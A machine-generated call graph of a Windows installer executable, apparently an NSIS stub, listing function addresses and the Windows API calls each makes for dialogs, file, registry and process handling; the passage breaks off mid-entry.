4006 405fb1 lstrcmpiA 4004->4006 4005->3994 4005->3995 4006->4005 4007 405fcf CharNextA 4006->4007 4007->4004 4344 404cd9 4345 404d05 4344->4345 4346 404ce9 4344->4346 4348 404d38 4345->4348 4349 404d0b SHGetPathFromIDListW 4345->4349 4355 405b86 GetDlgItemTextW 4346->4355 4351 404d22 SendMessageW 4349->4351 4352 404d1b 4349->4352 4350 404cf6 SendMessageW 4350->4345 4351->4348 4354 40140b 2 API calls 4352->4354 4354->4351 4355->4350 4356 406c5b 4357 406adf 4356->4357 4358 40744a 4357->4358 4359 406b60 GlobalFree 4357->4359 4360 406b69 GlobalAlloc 4357->4360 4361 406be0 GlobalAlloc 4357->4361 4362 406bd7 GlobalFree 4357->4362 4359->4360 4360->4357 4360->4358 4361->4357 4361->4358 4362->4361 4363 40175c 4364 402d3e 17 API calls 4363->4364 4365 401763 4364->4365 4366 406061 2 API calls 4365->4366 4367 40176a 4366->4367 4367->4367 4368 401d5d 4369 402d1c 17 API calls 4368->4369 4370 401d6e SetWindowLongW 4369->4370 4371 402bc2 4370->4371 4372 401ede 4373 402d1c 17 API calls 4372->4373 4374 401ee4 4373->4374 4375 402d1c 17 API calls 4374->4375 4376 401ef0 4375->4376 4377 401f07 EnableWindow 4376->4377 4378 401efc ShowWindow 4376->4378 4379 402bc2 4377->4379 4378->4379 3490 4056e3 3491 405704 GetDlgItem GetDlgItem GetDlgItem 3490->3491 3492 40588d 3490->3492 3535 4044c7 SendMessageW 3491->3535 3494 405896 GetDlgItem CreateThread CloseHandle 3492->3494 3495 4058be 3492->3495 3494->3495 3558 405677 OleInitialize 3494->3558 3496 4058e9 3495->3496 3498 4058d5 ShowWindow ShowWindow 3495->3498 3499 40590e 3495->3499 3500 405949 3496->3500 3502 405923 ShowWindow 3496->3502 3503 4058fd 3496->3503 3497 405774 3505 40577b GetClientRect GetSystemMetrics SendMessageW SendMessageW 3497->3505 3540 4044c7 SendMessageW 3498->3540 3544 4044f9 3499->3544 3500->3499 3508 405957 SendMessageW 3500->3508 3511 405943 3502->3511 3512 405935 3502->3512 3541 40446b 3503->3541 3506 4057e9 3505->3506 3507 4057cd SendMessageW SendMessageW 3505->3507 3513 4057fc 3506->3513 3514 4057ee SendMessageW 3506->3514 3507->3506 3510 40591c 3508->3510 3515 405970 CreatePopupMenu 3508->3515 3517 40446b SendMessageW 3511->3517 3516 4055a4 24 API calls 3512->3516 3536 404492 3513->3536 3514->3513 3518 406579 17 API calls 3515->3518 3516->3511 3517->3500 3520 405980 AppendMenuW 3518->3520 3522 4059b0 TrackPopupMenu 3520->3522 3523 40599d GetWindowRect 3520->3523 3521 40580c 3524 405815 ShowWindow 3521->3524 3525 405849 GetDlgItem SendMessageW 3521->3525 3522->3510 3526 4059cb 3522->3526 3523->3522 3527 405838 3524->3527 3528 40582b ShowWindow 3524->3528 3525->3510 3529 405870 SendMessageW SendMessageW 3525->3529 3530 4059e7 SendMessageW 3526->3530 3539 4044c7 SendMessageW 3527->3539 3528->3527 3529->3510 3530->3530 3531 405a04 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3530->3531 3533 405a29 SendMessageW 3531->3533 3533->3533 3534 405a52 GlobalUnlock SetClipboardData CloseClipboard 3533->3534 3534->3510 3535->3497 3537 406579 17 API calls 3536->3537 3538 40449d SetDlgItemTextW 3537->3538 3538->3521 3539->3525 3540->3496 3542 404472 3541->3542 3543 404478 SendMessageW 3541->3543 3542->3543 3543->3499 3545 4045bc 3544->3545 3546 404511 GetWindowLongW 3544->3546 3545->3510 3546->3545 3547 404526 3546->3547 3547->3545 3548 404553 GetSysColor 3547->3548 3549 404556 3547->3549 3548->3549 3550 404566 SetBkMode 3549->3550 3551 40455c SetTextColor 3549->3551 3552 404584 3550->3552 3553 40457e GetSysColor 3550->3553 3551->3550 3554 404595 3552->3554 3555 40458b SetBkColor 3552->3555 3553->3552 3554->3545 3556 4045a8 DeleteObject 3554->3556 3557 4045af CreateBrushIndirect 3554->3557 3555->3554 3556->3557 3557->3545 3565 4044de 3558->3565 3560 40569a 3564 4056c1 3560->3564 3568 401389 3560->3568 3561 4044de SendMessageW 3562 4056d3 CoUninitialize 3561->3562 3564->3561 3566 4044f6 3565->3566 3567 4044e7 SendMessageW 3565->3567 3566->3560 3567->3566 3570 401390 3568->3570 3569 4013fe 3569->3560 3570->3569 3571 4013cb MulDiv SendMessageW 3570->3571 3571->3570 4380 401563 4381 402b08 4380->4381 4384 406483 wsprintfW 4381->4384 4383 402b0d 4384->4383 4392 4026e4 4393 402d1c 17 API calls 4392->4393 4401 4026f3 4393->4401 4394 40273d ReadFile 4394->4401 4404 402830 4394->4404 4395 4060b5 ReadFile 4395->4401 4396 402832 4414 406483 wsprintfW 4396->4414 4397 40277d MultiByteToWideChar 4397->4401 4400 4027a3 SetFilePointer MultiByteToWideChar 4400->4401 4401->4394 4401->4395 4401->4396 4401->4397 4401->4400 4402 402843 4401->4402 4401->4404 4405 406113 SetFilePointer 4401->4405 4403 402864 SetFilePointer 4402->4403 4402->4404 4403->4404 4406 40612f 4405->4406 4408 406147 4405->4408 4407 4060b5 ReadFile 4406->4407 4409 40613b 4407->4409 4408->4401 4409->4408 4410 406150 SetFilePointer 4409->4410 4411 406178 SetFilePointer 4409->4411 4410->4411 4412 40615b 4410->4412 4411->4408 4413 4060e4 WriteFile 4412->4413 4413->4408 4414->4404 3600 405b68 ShellExecuteExW 4415 401968 4416 402d1c 17 API calls 4415->4416 4417 40196f 4416->4417 4418 402d1c 17 API calls 4417->4418 4419 40197c 4418->4419 4420 402d3e 17 API calls 4419->4420 4421 401993 lstrlenW 4420->4421 4422 4019a4 4421->4422 4423 4019e5 4422->4423 4427 40653c lstrcpynW 4422->4427 4425 4019d5 4425->4423 4426 4019da lstrlenW 4425->4426 4426->4423 4427->4425 4428 40166a 4429 402d3e 17 API calls 4428->4429 4430 401670 4429->4430 4431 40689a 2 API calls 4430->4431 4432 401676 4431->4432 3611 4023ec 3612 402d3e 17 API calls 3611->3612 3613 4023fb 3612->3613 3614 402d3e 17 API calls 3613->3614 3615 402404 3614->3615 3616 402d3e 17 API calls 3615->3616 3617 40240e GetPrivateProfileStringW 3616->3617 3647 40176f 3648 402d3e 17 API calls 3647->3648 3649 401776 3648->3649 3650 401796 3649->3650 3651 40179e 3649->3651 3689 40653c lstrcpynW 3650->3689 3690 40653c lstrcpynW 3651->3690 3654 40179c 3658 4067eb 5 API calls 3654->3658 3655 4017a9 3691 405e11 lstrlenW CharPrevW 3655->3691 3663 4017bb 3658->3663 3662 4017cd CompareFileTime 3662->3663 3663->3662 3664 40188d 3663->3664 3667 40653c lstrcpynW 3663->3667 3673 406579 17 API calls 3663->3673 3682 401864 3663->3682 3685 40600d GetFileAttributesW 3663->3685 3688 406032 GetFileAttributesW CreateFileW 3663->3688 3694 40689a FindFirstFileW 3663->3694 3697 405ba2 3663->3697 3665 4055a4 24 API calls 3664->3665 3668 401897 3665->3668 3666 4055a4 24 API calls 3684 401879 3666->3684 3667->3663 3669 403309 44 API calls 3668->3669 3670 4018aa 3669->3670 3671 4018be SetFileTime 3670->3671 3672 4018d0 CloseHandle 3670->3672 3671->3672 3674 4018e1 3672->3674 3672->3684 3673->3663 3675 4018e6 3674->3675 3676 4018f9 3674->3676 3677 406579 17 API calls 3675->3677 3678 406579 17 API calls 3676->3678 3680 4018ee lstrcatW 3677->3680 3681 401901 3678->3681 3680->3681 3683 405ba2 MessageBoxIndirectW 3681->3683 3682->3666 3682->3684 3683->3684 3686 40602c 3685->3686 3687 40601f SetFileAttributesW 3685->3687 3686->3663 3687->3686 3688->3663 3689->3654 3690->3655 3692 4017af lstrcatW 3691->3692 3693 405e2d lstrcatW 3691->3693 3692->3654 3693->3692 3695 4068b0 FindClose 3694->3695 3696 4068bb 3694->3696 3695->3696 3696->3663 3698 405bb7 3697->3698 3699 405c03 3698->3699 3700 405bcb MessageBoxIndirectW 3698->3700 3699->3663 3700->3699 4433 401a72 4434 402d1c 17 API calls 4433->4434 4435 401a7b 4434->4435 4436 402d1c 17 API calls 4435->4436 4437 401a20 4436->4437 3701 401573 3702 401583 ShowWindow 3701->3702 3703 40158c 3701->3703 3702->3703 3704 402bc2 3703->3704 3705 40159a ShowWindow 3703->3705 3705->3704 4438 4014f5 SetForegroundWindow 4439 402bc2 4438->4439 4440 401ff6 4441 402d3e 17 API calls 4440->4441 4442 401ffd 4441->4442 4443 40689a 2 API calls 4442->4443 4444 402003 4443->4444 4446 402014 4444->4446 4447 406483 wsprintfW 4444->4447 4447->4446 3717 4022f7 3718 402d3e 17 API calls 3717->3718 3719 4022fd 3718->3719 3720 402d3e 17 API calls 3719->3720 3721 402306 3720->3721 3722 402d3e 17 API calls 3721->3722 3723 40230f 3722->3723 3724 40689a 2 API calls 3723->3724 3725 402318 3724->3725 3726 402329 lstrlenW lstrlenW 3725->3726 3727 40231c 3725->3727 3729 4055a4 24 API calls 3726->3729 3728 4055a4 24 API calls 3727->3728 3731 402324 3727->3731 3728->3731 3730 402367 SHFileOperationW 3729->3730 3730->3727 3730->3731 4448 401b77 4449 402d3e 17 API calls 4448->4449 4450 401b7e 4449->4450 4451 402d1c 17 API calls 4450->4451 4452 401b87 wsprintfW 4451->4452 4453 402bc2 4452->4453 4141 40167b 4142 402d3e 17 API calls 4141->4142 4143 401682 4142->4143 4144 402d3e 17 API calls 4143->4144 4145 40168b 4144->4145 4146 402d3e 17 API calls 4145->4146 4147 401694 MoveFileW 4146->4147 4148 4016a0 4147->4148 4149 4016a7 4147->4149 4150 401423 24 API calls 4148->4150 4151 40689a 2 API calls 4149->4151 4153 4022ee 4149->4153 4150->4153 4152 4016b6 4151->4152 4152->4153 4154 406302 36 API calls 4152->4154 4154->4148 4461 40237b 4462 402382 4461->4462 4466 402395 4461->4466 4463 406579 17 API calls 4462->4463 4464 40238f 4463->4464 4465 405ba2 MessageBoxIndirectW 4464->4465 4465->4466 4467 404eff GetDlgItem GetDlgItem 4468 404f53 7 API calls 4467->4468 4480 40517d 4467->4480 4469 404ff0 SendMessageW 4468->4469 4470 404ffd DeleteObject 4468->4470 4469->4470 4471 405008 4470->4471 4473 40503f 4471->4473 4474 406579 17 API calls 4471->4474 4472 405265 4476 40530e 4472->4476 4482 405170 4472->4482 4487 4052bb SendMessageW 4472->4487 4475 404492 18 API calls 4473->4475 4477 405021 SendMessageW SendMessageW 4474->4477 4481 405053 4475->4481 4478 405323 4476->4478 4479 405317 SendMessageW 4476->4479 4477->4471 4489 405335 ImageList_Destroy 4478->4489 4490 40533c 4478->4490 4498 40534c 4478->4498 4479->4478 4480->4472 4501 4051ef 4480->4501 4521 404e4d SendMessageW 4480->4521 4486 404492 18 API calls 4481->4486 4484 4044f9 8 API calls 4482->4484 4483 405257 SendMessageW 4483->4472 4488 405511 4484->4488 4502 405064 4486->4502 4487->4482 4492 4052d0 SendMessageW 4487->4492 4489->4490 4493 405345 GlobalFree 4490->4493 4490->4498 4491 4054c5 4491->4482 4496 4054d7 ShowWindow GetDlgItem ShowWindow 4491->4496 4495 4052e3 4492->4495 4493->4498 4494 40513f GetWindowLongW SetWindowLongW 4497 405158 4494->4497 4503 4052f4 SendMessageW 4495->4503 4496->4482 4499 405175 4497->4499 4500 40515d ShowWindow 4497->4500 4498->4491 4512 405387 4498->4512 4526 404ecd 4498->4526 4520 4044c7 SendMessageW 4499->4520 4519 4044c7 SendMessageW 4500->4519 4501->4472 4501->4483 4502->4494 4504 40513a 4502->4504 4508 4050b7 SendMessageW 4502->4508 4509 4050f5 SendMessageW 4502->4509 4510 405109 SendMessageW 4502->4510 4503->4476 4504->4494 4504->4497 4505 4053cb 4513 405491 4505->4513 4518 40543f SendMessageW SendMessageW 4505->4518 4508->4502 4509->4502 4510->4502 4512->4505 4515 4053b5 SendMessageW 4512->4515 4514 40549b InvalidateRect 4513->4514 4516 4054a7 4513->4516 4514->4516 4515->4505 4516->4491 4535 404e08 4516->4535 4518->4505 4519->4482 4520->4480 4522 404e70 GetMessagePos ScreenToClient SendMessageW 4521->4522 4523 404eac SendMessageW 4521->4523 4524 404ea9 4522->4524 4525 404ea4 4522->4525 4523->4525 4524->4523 4525->4501 4538 40653c lstrcpynW 4526->4538 4528 404ee0 4539 406483 wsprintfW 4528->4539 4530 404eea 4531 40140b 2 API calls 4530->4531 4532 404ef3 4531->4532 4540 40653c lstrcpynW 4532->4540 4534 404efa 4534->4512 4541 404d3f 4535->4541 4537 404e1d 4537->4491 4538->4528 4539->4530 4540->4534 4542 404d58 4541->4542 4543 406579 17 API calls 4542->4543 4544 404dbc 4543->4544 4545 406579 17 API calls 4544->4545 4546 404dc7 4545->4546 4547 406579 17 API calls 4546->4547 4548 404ddd lstrlenW wsprintfW SetDlgItemTextW 4547->4548 4548->4537 4549 4019ff 4550 402d3e 17 API calls 4549->4550 4551 401a06 4550->4551 4552 402d3e 17 API calls 4551->4552 4553 401a0f 4552->4553 4554 401a16 lstrcmpiW 4553->4554 4555 401a28 lstrcmpW 4553->4555 4556 401a1c 4554->4556 4555->4556 4557 401000 4558 401037 BeginPaint GetClientRect 4557->4558 4559 40100c DefWindowProcW 4557->4559 4561 4010f3 4558->4561 4562 401179 4559->4562 4563 401073 CreateBrushIndirect FillRect DeleteObject 4561->4563 4564 4010fc 4561->4564 4563->4561 4565 401102 CreateFontIndirectW 4564->4565 4566 401167 EndPaint 4564->4566 4565->4566 4567 401112 6 API calls 4565->4567 4566->4562 4567->4566 4568 401d81 4569 401d94 GetDlgItem 4568->4569 4570 401d87 4568->4570 4573 401d8e 4569->4573 4571 402d1c 17 API calls 4570->4571 4571->4573 4572 401dd5 GetClientRect LoadImageW SendMessageW 4576 401e33 4572->4576 4578 401e3f 4572->4578 4573->4572 4574 402d3e 17 API calls 4573->4574 4574->4572 4577 401e38 DeleteObject 4576->4577 4576->4578 4577->4578 3332 402482 3333 402d3e 17 API calls 3332->3333 3334 402494 3333->3334 3335 402d3e 17 API calls 3334->3335 3336 40249e 3335->3336 3349 402dce 3336->3349 3339 4024d6 3347 4024e2 3339->3347 3368 402d1c 3339->3368 3340 402d3e 17 API calls 3342 4024cc lstrlenW 3340->3342 3341 402925 3342->3339 3344 402501 RegSetValueExW 3346 402517 RegCloseKey 3344->3346 3346->3341 3347->3344 3353 403309 3347->3353 3350 402de9 3349->3350 3371 4063d7 3350->3371 3354 403334 3353->3354 3355 403318 SetFilePointer 3353->3355 3375 403411 GetTickCount 3354->3375 3355->3354 3358 4033d1 3358->3344 3361 403411 42 API calls 3362 40336b 3361->3362 3362->3358 3363 4033d7 ReadFile 3362->3363 3365 40337a 3362->3365 3363->3358 3365->3358 3366 4060b5 ReadFile 3365->3366 3390 4060e4 WriteFile 3365->3390 3366->3365 3369 406579 17 API calls 3368->3369 3370 402d31 3369->3370 3370->3347 3372 4063e6 3371->3372 3373 4063f1 RegCreateKeyExW 3372->3373 3374 4024ae 3372->3374 3373->3374 3374->3339 3374->3340 3374->3341 3376 403569 3375->3376 3377 40343f 3375->3377 3378 402fc6 32 API calls 3376->3378 3392 403590 SetFilePointer 3377->3392 3380 40333b 3378->3380 3380->3358 3388 4060b5 ReadFile 3380->3388 3381 40344a SetFilePointer 3386 40346f 3381->3386 3385 4060e4 WriteFile 3385->3386 3386->3380 3386->3385 3387 40354a SetFilePointer 3386->3387 3393 40357a 3386->3393 3396 406aac 3386->3396 3403 402fc6 3386->3403 3387->3376 3389 403354 3388->3389 3389->3358 3389->3361 3391 406102 3390->3391 3391->3365 3392->3381 3394 4060b5 ReadFile 3393->3394 3395 40358d 3394->3395 3395->3386 3397 406ad1 3396->3397 3400 406ad9 3396->3400 3397->3386 3398 406b60 GlobalFree 3399 406b69 GlobalAlloc 3398->3399 3399->3397 3399->3400 3400->3397 3400->3398 3400->3399 3401 406be0 GlobalAlloc 3400->3401 3402 406bd7 GlobalFree 3400->3402 3401->3397 3401->3400 3402->3401 3404 402fd7 3403->3404 3405 402fef 3403->3405 3406 402fe0 DestroyWindow 3404->3406 3409 402fe7 3404->3409 3407 402ff7 3405->3407 3408 402fff GetTickCount 3405->3408 3406->3409 3418 40696d 3407->3418 3408->3409 3411 40300d 3408->3411 3409->3386 3412 403042 CreateDialogParamW ShowWindow 3411->3412 3413 403015 3411->3413 3412->3409 3413->3409 3422 402faa 3413->3422 3415 403023 wsprintfW 3416 4055a4 24 API calls 3415->3416 3417 403040 3416->3417 3417->3409 3419 40698a PeekMessageW 3418->3419 3420 406980 DispatchMessageW 3419->3420 3421 40699a 3419->3421 3420->3419 3421->3409 3423 402fb9 3422->3423 3424 402fbb MulDiv 3422->3424 3423->3424 3424->3415 3425 402902 3426 402d3e 17 API calls 3425->3426 3427 402909 FindFirstFileW 3426->3427 3428 402931 3427->3428 3431 40291c 3427->3431 3433 406483 wsprintfW 3428->3433 3430 40293a 3434 40653c lstrcpynW 3430->3434 3433->3430 3434->3431 4579 404602 lstrlenW 4580 404621 4579->4580 4581 404623 WideCharToMultiByte 4579->4581 4580->4581 4582 401503 4583 40150b 4582->4583 4585 40151e 4582->4585 4584 402d1c 17 API calls 4583->4584 4584->4585 4586 404983 4587 4049c0 4586->4587 4588 4049af 4586->4588 4590 4049cc GetDlgItem 4587->4590 4595 404a2b 4587->4595 4647 405b86 GetDlgItemTextW 4588->4647 4593 4049e0 4590->4593 4591 404b0f 4645 404cbe 4591->4645 4649 405b86 GetDlgItemTextW 4591->4649 4592 4049ba 4594 4067eb 5 API calls 4592->4594 4597 4049f4 SetWindowTextW 4593->4597 4598 405ebc 4 API calls 4593->4598 4594->4587 4595->4591 4599 406579 17 API calls 4595->4599 4595->4645 4601 404492 18 API calls 4597->4601 4603 4049ea 4598->4603 4604 404a9f SHBrowseForFolderW 4599->4604 4600 404b3f 4605 405f19 18 API calls 4600->4605 4606 404a10 4601->4606 4602 4044f9 8 API calls 4607 404cd2 4602->4607 4603->4597 4611 405e11 3 API calls 4603->4611 4604->4591 4608 404ab7 CoTaskMemFree 4604->4608 4609 404b45 4605->4609 4610 404492 18 API calls 4606->4610 4612 405e11 3 API calls 4608->4612 4650 40653c lstrcpynW 4609->4650 4613 404a1e 4610->4613 4611->4597 4614 404ac4 4612->4614 4648 4044c7 SendMessageW 4613->4648 4617 404afb SetDlgItemTextW 4614->4617 4622 406579 17 API calls 4614->4622 4617->4591 4618 404a24 4620 406931 5 API calls 4618->4620 4619 404b5c 4621 406931 5 API calls 4619->4621 4620->4595 4629 404b63 4621->4629 4623 404ae3 lstrcmpiW 4622->4623 4623->4617 4626 404af4 lstrcatW 4623->4626 4624 404ba4 4651 40653c lstrcpynW 4624->4651 4626->4617 4627 404bab 4628 405ebc 4 API calls 4627->4628 4630 404bb1 GetDiskFreeSpaceW 4628->4630 4629->4624 4632 405e5d 2 API calls 4629->4632 4634 404bfc 4629->4634 4633 404bd5 MulDiv 4630->4633 4630->4634 4632->4629 4633->4634 4635 404c6d 4634->4635 4637 404e08 20 API calls 4634->4637 4636 404c90 4635->4636 4638 40140b 2 API calls 4635->4638 4652 4044b4 KiUserCallbackDispatcher 4636->4652 4639 404c5a 4637->4639 4638->4636 4641 404c6f SetDlgItemTextW 4639->4641 4642 404c5f 4639->4642 4641->4635 4644 404d3f 20 API calls 4642->4644 4643 404cac 4643->4645 4646 4048dc SendMessageW 4643->4646 4644->4635 4645->4602 4646->4645 4647->4592 4648->4618 4649->4600 4650->4619 4651->4627 4652->4643 4653 402889 4654 402890 4653->4654 4660 402b0d 4653->4660 4655 402d1c 17 API calls 4654->4655 4656 402897 4655->4656 4657 4028a6 SetFilePointer 4656->4657 4658 4028b6 4657->4658 4657->4660 4661 406483 wsprintfW 4658->4661 4661->4660 4662 40190c 4663 401943 4662->4663 4664 402d3e 17 API calls 4663->4664 4665 401948 4664->4665 4666 405c4e 67 API calls 4665->4666 4667 401951 4666->4667 4668 40190f 4669 402d3e 17 API calls 4668->4669 4670 401916 4669->4670 4671 405ba2 MessageBoxIndirectW 4670->4671 4672 40191f 4671->4672 4673 407090 4677 406adf 4673->4677 4674 40744a 4675 406b60 GlobalFree 4676 406b69 GlobalAlloc 4675->4676 4676->4674 4676->4677 4677->4674 4677->4675 4677->4676 4677->4677 4678 406be0 GlobalAlloc 4677->4678 4679 406bd7 GlobalFree 4677->4679 4678->4674 4678->4677 4679->4678 4680 401491 4681 4055a4 24 API calls 4680->4681 4682 401498 4681->4682 4690 401f12 4691 402d3e 17 API calls 4690->4691 4692 401f18 4691->4692 4693 402d3e 17 API calls 4692->4693 4694 401f21 4693->4694 4695 402d3e 17 API calls 4694->4695 4696 401f2a 4695->4696 4697 402d3e 17 API calls 4696->4697 4698 401f33 4697->4698 4699 401423 24 API calls 4698->4699 4700 401f3a 4699->4700 4707 405b68 ShellExecuteExW 4700->4707 4702 401f82 4703 4069dc 5 API calls 4702->4703 4704 402925 4702->4704 4705 401f9f CloseHandle 4703->4705 4705->4704 4707->4702 4708 402614 4709 402d3e 17 API calls 4708->4709 4710 40261b 4709->4710 4713 406032 GetFileAttributesW CreateFileW 4710->4713 4712 402627 4713->4712 3706 402596 3707 402d7e 17 API calls 3706->3707 3708 4025a0 3707->3708 3709 402d1c 17 API calls 3708->3709 3710 4025a9 3709->3710 3711 4025d1 RegEnumValueW 3710->3711 3712 4025c5 RegEnumKeyW 3710->3712 3714 402925 3710->3714 3713 4025e6 3711->3713 3715 4025ed RegCloseKey 3711->3715 3712->3715 3713->3715 3715->3714 4714 401d17 4715 402d1c 17 API calls 4714->4715 4716 401d1d IsWindow 4715->4716 4717 401a20 4716->4717 4718 405518 4719 405528 4718->4719 4720 40553c 4718->4720 4721 40552e 4719->4721 4730 405585 4719->4730 4722 405544 IsWindowVisible 4720->4722 4728 40555b 4720->4728 4724 4044de SendMessageW 4721->4724 4725 405551 4722->4725 4722->4730 4723 40558a CallWindowProcW 4727 405538 4723->4727 4724->4727 4726 404e4d 5 API calls 4725->4726 4726->4728 4728->4723 4729 404ecd 4 API calls 4728->4729 4729->4730 4730->4723 4008 403b19 4009 403b34 4008->4009 4010 403b2a CloseHandle 4008->4010 4011 403b48 4009->4011 4012 403b3e CloseHandle 4009->4012 4010->4009 4017 403b76 4011->4017 4012->4011 4018 403b84 4017->4018 4019 403b4d 4018->4019 4020 403b89 FreeLibrary GlobalFree 4018->4020 4021 405c4e 4019->4021 4020->4019 4020->4020 4022 405f19 18 API calls 4021->4022 4023 405c6e 4022->4023 4024 405c76 DeleteFileW 4023->4024 4025 405c8d 4023->4025 4054 403b59 4024->4054 4026 405dad 4025->4026 4057 40653c lstrcpynW 4025->4057 4033 40689a 2 API calls 4026->4033 4026->4054 4028 405cb3 4029 405cc6 4028->4029 4030 405cb9 lstrcatW 4028->4030 4032 405e5d 2 API calls 4029->4032 4031 405ccc 4030->4031 4034 405cdc lstrcatW 4031->4034 4036 405ce7 lstrlenW FindFirstFileW 4031->4036 4032->4031 4035 405dd2 4033->4035 4034->4036 4037 405e11 3 API calls 4035->4037 4035->4054 4036->4026 4039 405d09 4036->4039 4038 405ddc 4037->4038 4041 405c06 5 API calls 4038->4041 4040 405d90 FindNextFileW 4039->4040 4050 405c4e 60 API calls 4039->4050 4052 4055a4 24 API calls 4039->4052 4055 4055a4 24 API calls 4039->4055 4056 406302 36 API calls 4039->4056 4058 40653c lstrcpynW 4039->4058 4059 405c06 4039->4059 4040->4039 4044 405da6 FindClose 4040->4044 4043 405de8 4041->4043 4045 405e02 4043->4045 4046 405dec 4043->4046 4044->4026 4048 4055a4 24 API calls 4045->4048 4049 4055a4 24 API calls 4046->4049 4046->4054 4048->4054 4051 405df9 4049->4051 4050->4039 4053 406302 36 API calls 4051->4053 4052->4040 4053->4054 4055->4039 4056->4039 4057->4028 4058->4039 4060 40600d 2 API calls 4059->4060 4061 405c12 4060->4061 4062 405c33 4061->4062 4063 405c21 RemoveDirectoryW 4061->4063 4064 405c29 DeleteFileW 4061->4064 4062->4039 4065 405c2f 4063->4065 4064->4065 4065->4062 4066 405c3f SetFileAttributesW 4065->4066 4066->4062 4738 401b9b 4739 401bec 4738->4739 4740 401ba8 4738->4740 4742 401bf1 4739->4742 4743 401c16 GlobalAlloc 4739->4743 4741 401c31 4740->4741 4746 401bbf 4740->4746 4745 406579 17 API calls 4741->4745 4752 402395 4741->4752 4742->4752 4759 40653c lstrcpynW 4742->4759 4744 406579 17 API calls 4743->4744 4744->4741 4747 40238f 4745->4747 4757 40653c lstrcpynW 4746->4757 4753 405ba2 MessageBoxIndirectW 4747->4753 4750 401c03 GlobalFree 4750->4752 4751 401bce 4758 40653c lstrcpynW 4751->4758 4753->4752 4755 401bdd 4760 40653c lstrcpynW 4755->4760 4757->4751 4758->4755 4759->4750 4760->4752 4761 402b9d SendMessageW 4762 402bb7 InvalidateRect 4761->4762 4763 402bc2 4761->4763 4762->4763 4764 40149e 4765 402395 4764->4765 4766 4014ac PostQuitMessage 4764->4766 4766->4765 3435 4021a2 3436 402d3e 17 API calls 3435->3436 3437 4021a9 3436->3437 3438 402d3e 17 API calls 3437->3438 3439 4021b3 3438->3439 3440 402d3e 17 API calls 3439->3440 3441 4021bd 3440->3441 3442 402d3e 17 API calls 3441->3442 3443 4021c7 3442->3443 3444 402d3e 17 API calls 3443->3444 3446 4021d1 3444->3446 3445 402210 CoCreateInstance 3448 40222f 3445->3448 3446->3445 3447 402d3e 17 API calls 3446->3447 3447->3445 3449 401423 24 API calls 3448->3449 3450 4022ee 3448->3450 3449->3450 3451 402522 3462 402d7e 3451->3462 3454 402d3e 17 API calls 3455 402535 3454->3455 3456 402540 RegQueryValueExW 3455->3456 3461 402925 3455->3461 3457 402560 3456->3457 3458 402566 RegCloseKey 3456->3458 3457->3458 3467 406483 wsprintfW 3457->3467 3458->3461 3463 402d3e 17 API calls 3462->3463 3464 402d95 3463->3464 3465 4063a9 RegOpenKeyExW 3464->3465 3466 40252c 3465->3466 3466->3454 3467->3458 3572 4015a3 3573 402d3e 17 API calls 3572->3573 3574 4015aa SetFileAttributesW 3573->3574 3575 4015bc 3574->3575 3576 401fa4 3577 402d3e 17 API calls 3576->3577 3578 401faa 3577->3578 3579 4055a4 24 API calls 3578->3579 3580 401fb4 3579->3580 3591 405b25 CreateProcessW 3580->3591 3583 401fdd CloseHandle 3587 402925 3583->3587 3586 401fcf 3588 401fd4 3586->3588 3589 401fdf 3586->3589 3599 406483 wsprintfW 3588->3599 3589->3583 3592 401fba 3591->3592 3593 405b58 CloseHandle 3591->3593 3592->3583 3592->3587 3594 4069dc WaitForSingleObject 3592->3594 3593->3592 3595 4069f6 3594->3595 3596 406a08 GetExitCodeProcess 3595->3596 3597 40696d 2 API calls 3595->3597 3596->3586 3598 4069fd WaitForSingleObject 3597->3598 3598->3595 3599->3583 3601 4023aa 3602 4023b2 3601->3602 3605 4023b8 3601->3605 3603 402d3e 17 API calls 3602->3603 3603->3605 3604 4023c6 3607 4023d4 3604->3607 3609 402d3e 17 API calls 3604->3609 3605->3604 3606 402d3e 17 API calls 3605->3606 3606->3604 3608 402d3e 17 API calls 3607->3608 3610 4023dd WritePrivateProfileStringW 3608->3610 3609->3607 4774 40202a 4775 402d3e 17 API calls 4774->4775 4776 402031 4775->4776 4777 406931 5 API calls 4776->4777 4778 402040 4777->4778 4779 4020c4 4778->4779 4780 40205c GlobalAlloc 4778->4780 4780->4779 4781 402070 4780->4781 4782 406931 5 API calls 4781->4782 4783 402077 4782->4783 4784 406931 5 API calls 4783->4784 4785 402081 4784->4785 4785->4779 4789 406483 wsprintfW 4785->4789 4787 4020b6 4790 406483 wsprintfW 4787->4790 4789->4787 4790->4779 4791 402f2b 4792 402f56 4791->4792 4793 402f3d SetTimer 4791->4793 4794 402fa4 4792->4794 4795 402faa MulDiv 4792->4795 4793->4792 4796 402f64 wsprintfW SetWindowTextW SetDlgItemTextW 4795->4796 4796->4794 3618 40242c 3619 402434 3618->3619 3620 40245f 3618->3620 3621 402d7e 17 API calls 3619->3621 3622 402d3e 17 API calls 3620->3622 3623 40243b 3621->3623 3624 402466 3622->3624 3625 402445 3623->3625 3629 402473 3623->3629 3630 402dfc 3624->3630 3627 402d3e 17 API calls 3625->3627 3628 40244c RegDeleteValueW RegCloseKey 3627->3628 3628->3629 3631 402e10 3630->3631 3633 402e09 3630->3633 3631->3633 3634 402e41 3631->3634 3633->3629 3635 4063a9 RegOpenKeyExW 3634->3635 3636 402e6f 3635->3636 3637 402e7f RegEnumValueW 3636->3637 3641 402ea2 3636->3641 3645 402f19 3636->3645 3638 402f09 RegCloseKey 3637->3638 3637->3641 3638->3645 3639 402ede RegEnumKeyW 3640 402ee7 RegCloseKey 3639->3640 3639->3641 3642 406931 5 API calls 3640->3642 3641->3638 3641->3639 3641->3640 3643 402e41 6 API calls 3641->3643 3644 402ef7 3642->3644 3643->3641 3644->3645 3646 402efb RegDeleteKeyW 3644->3646 3645->3633 3646->3645 4798 401a30 4799 402d3e 17 API calls 4798->4799 4800 401a39 ExpandEnvironmentStringsW 4799->4800 4801 401a4d 4800->4801 4803 401a60 4800->4803 4802 401a52 lstrcmpW 4801->4802 4801->4803 4802->4803 4809 401735 4810 402d3e 17 API calls 4809->4810 4811 40173c SearchPathW 4810->4811 4812 401757 4811->4812 4813 402636 4814 402665 4813->4814 4815 40264a 4813->4815 4816 402695 4814->4816 4817 40266a 4814->4817 4818 402d1c 17 API calls 4815->4818 4820 402d3e 17 API calls 4816->4820 4819 402d3e 17 API calls 4817->4819 4825 402651 4818->4825 4821 402671 4819->4821 4822 40269c lstrlenW 4820->4822 4830 40655e WideCharToMultiByte 4821->4830 4822->4825 4824 402685 lstrlenA 4824->4825 4826 4026df 4825->4826 4827 4026c9 4825->4827 4829 406113 5 